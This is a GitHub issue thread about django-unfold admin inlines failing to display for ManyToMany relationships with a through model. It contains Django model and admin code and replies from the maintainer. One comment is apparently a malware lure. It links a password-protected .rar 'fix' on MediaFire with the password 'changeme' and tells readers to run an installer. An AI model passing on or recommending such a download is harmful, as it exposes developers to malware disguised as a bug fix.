### ISSUE TITLE
Inline forms for ManyToMany relationships are not displayed when using the through parameter

### ISSUE THREAD

**Issue by eamigo86** [unfoldadmin/django-unfold#704]
**What version of Unfold are you using?**
0.36.0

**What version of Django are you using?**
5.1

**What browser are you using?**
Chrome v127.0.6533.122 (MacOS)

**Did you checked changelog/commit history, if the bug is not already fixed?**
Yes

**Did you searched other issues, if the bug is not already fixed?**
Yes

**Repository with reproduced bug**
I’m just testing locally with a minimal project.

**Describe your issue:**
Inline forms for ManyToMany relationships are not displayed when using the **through** parameter

**Minimal steps to reproduce the issue**:

1- Define some models:

```python
from django.db import models


class Product(models.Model):
    name = models.CharField(max_length=255)
    price = models.DecimalField(max_digits=10, decimal_places=2)

    def __str__(self):
        return self.name


class Order(models.Model):
    customer = models.CharField(max_length=255)
    created_at = models.DateTimeField(auto_now_add=True)
    products = models.ManyToManyField(Product, through='OrderItem', related_name='orders')

    def __str__(self):
        return f"Order {self.id} for {self.customer}"


class OrderItem(models.Model):
    order = models.ForeignKey(Order, on_delete=models.CASCADE, related_name='items')
    product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name='order_items')
    quantity = models.PositiveIntegerField()

    def __str__(self):
        return f"{self.product.name} x {self.quantity}"
```

2-  Create custom StackedInline and ModelAdmin classes and register your models in the admin interface:

```python
from django.contrib import admin
from unfold.admin import ModelAdmin, StackedInline


class OrderItemInline(StackedInline):
    model = OrderItem
    extra = 1

 
@admin.register(Order)   
class OrderAdmin(ModelAdmin):
    inlines = [OrderItemInline]


@admin.register(Product)
class ProductAdmin(ModelAdmin):
    inlines = [OrderItemInline]  
```

3- Review your Product and Order forms in the admin. The StackedInline form is not displaying. 

**Extra info**:
1- If the relationship is defined without using the through parameter, it works as expected.
2- Not tested with other types of relational fields.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bolinocroustibat** [comment]
I have the same issue here, can confirm.

**Comment by lukasvinclav** [comment]
Hi, what exactly is not working? Do have any exception? Did you tried to use default Django admin to see if you configuration is going to work?

I guess you want to display `OrderItem` in `Order` admin. This should work as expected.

**Comment by eamigo86** [comment]
Hi @lukasvinclav, I didn't actually try using Django's native admin. I endend up decided not to use the "through" property in my ManytoMany relationship, so I was able to continue with my tests without any problem.
If I run into the problem again I will do the tests you suggest to have more context information to give you.
For now, you can close the issue if you wish. Thank you very much for your support
